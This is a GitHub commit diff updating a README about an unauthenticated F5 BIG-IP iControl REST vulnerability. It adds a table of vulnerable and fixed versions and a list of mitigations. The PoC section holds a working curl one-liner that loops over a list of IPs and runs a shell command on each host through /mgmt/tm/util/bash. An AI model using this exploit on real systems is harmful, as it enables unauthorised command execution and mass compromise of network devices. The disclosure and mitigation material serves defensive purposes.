Skip to content

Commit

Permalink
Update README.MD
Browse files Browse the repository at this point in the history
  • Loading branch information
shamo0 authored May 10, 2022
1 parent c839c38 commit 59b2022
Showing 1 changed file with 23 additions and 1 deletion.
24 changes: 23 additions & 1 deletion README.MD
Original file line number Diff line number Diff line change
Expand Up @@ -6,12 +6,34 @@ This vulnerability may allow an unauthenticated attacker with network access to

## PoC

You can use the following curl one liner to check for the F5 BigIP vulnerability or use the provided python script.
You can use the following curl one liner to check for the F5 Big-IP vulnerability or use the provided python script.

```bash
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
```

## Vulnerable Versions (Big-IP)

| Branch | Vulnerable Versions | Fixes Introduced |
| ---- | ----| ---- |
|11.x|11.6.1-11.6.5|No Fix|
|12.x|12.1.0-12.1.6|No Fix|
|13.x|13.1.0-13.1.4|13.1.5|
|14.x|14.1.0-14.1.4|14.1.4.6|
|15.x|15.1.0-15.1.5|15.1.5.1|
|16.x|16.1.0-16.1.2|16.1.2.2|
|17.x|None|17.0.0|

## Mitigation

<ul>
<li>Upgrade to the fixed version in ```Fixes Introduced``` Column. (Preferred Method)</li>
<li>Block iControl REST access through the self IP address</li>
<li>Block iControl REST access through the management interface</li>
<li>Modify the BIG-IP httpd configuration</li>
</ul>

For more information about mitigation check out the references.

## References
<ul>
Expand Down

0 comments on commit 59b2022

Please sign in to comment.